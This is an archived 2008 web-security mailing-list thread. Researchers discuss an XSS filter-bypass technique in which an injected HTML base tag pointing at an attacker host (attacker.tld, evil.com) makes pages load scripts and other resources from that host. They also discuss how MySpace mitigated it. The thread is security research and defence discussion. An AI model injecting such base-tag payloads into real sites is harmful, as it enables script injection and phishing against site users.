Re: [WEB SECURITY] Nice little XSS trick

["Amit Klein" <aksecurity@xxxxxxxxx>]

Hi Arshan+list,

Indeed - the same vulnerability. I did google for it, but I didn't
pick up your site (and RSnake's cheat sheet doesn't list it - now I
know why).

Anyway - sorry. You deserve full credit for it, of course.

Thanks for the correction and the further information,
-Amit


On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
>
>
>
> http://i8jesus.com/?p=10 (Jan 2008)
>
>
> I also presented this vector last year at OWASP San Jose when I demo'ed
> AntiSamy as an example of dangerous content that isn't malicious code on its
> own. That's one of the selling points of AntiSamy – it stops not only XSS
> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>
>
>
> I talked about it with RSnake afterwards and he had some crazy reason for
> not putting it on his cheatsheet – claimed it was too much like the <base
> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is longer
> (according to policy) supposed to be honoring <base> tags outside of <HEAD>,
> but FF is still vulnerable. You could use this to hijack anything –
> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
> won't help you steal as far as resources is anything gathered in JavaScript.
>
>
>
> I think some of the big players had this figured out already (or more
> likely, just got really lucky). MySpace takes <base href> values, base64
> encodes them, and redirects them through another domain. The flow is like
> this for them:
>
>
>
> 1.       User puts in <base href="http://evil.com";>
>
> 2.       Str = base64("http://evil.com";)
>
> 3.       Profile = <base
> href="http://msplinks.com/redir?<base64encodedStr>
>
>
>
> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
> have any relative links after user content, at least when I first looked at
> this last year. They probably both just got lucky. =]
>
>
>
> Arshan
>
>
>
> ---------- Previous message ----------
>
> From: Amit Klein <aksecurity@xxxxxxxxx>
>
> Date: Tue, Jul 15, 2008 at 7:33 AM
>
> Subject: [WEB SECURITY] Nice little XSS trick
>
> To: Web Security <websecurity@xxxxxxxxxxxxx>
>
>
>
>
>
> Hi list
>
>
>
> Recently I've been thinking about bypassing anti-XSS filters, and a nice
> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
> BASe, but not the trick I describe here). The idea is to use the HTML BASE
> tag to force loading of JS code from the attacker's host. Consider a page
> with XSS vulnerability such as:
>
>
>
> <html>
>
> ...
>
> ***XSS code may be embedded here***
>
> ...
>
> <script src="/foo/bar.js"></script>
>
> ...
>
> </html>
>
>
>
> Now, an attacker can inject <base
> href="http://www.attacker.tld/";>, and next thing you know,
> the browser (IE, at least) loads the JS from
> http://www.attacker.tld/foo/bar.js... And the beauty is
> that there's no "explicit" JS code involved in the payload itself.
>
>
>
> Note that according to the HTML standard, BASE should be placed in the HEAD
> section
> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
> This is indeed observed by FF 2, but not by IE (checked IE6).
>
>
>
> Thanks,
>
> -Amit

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA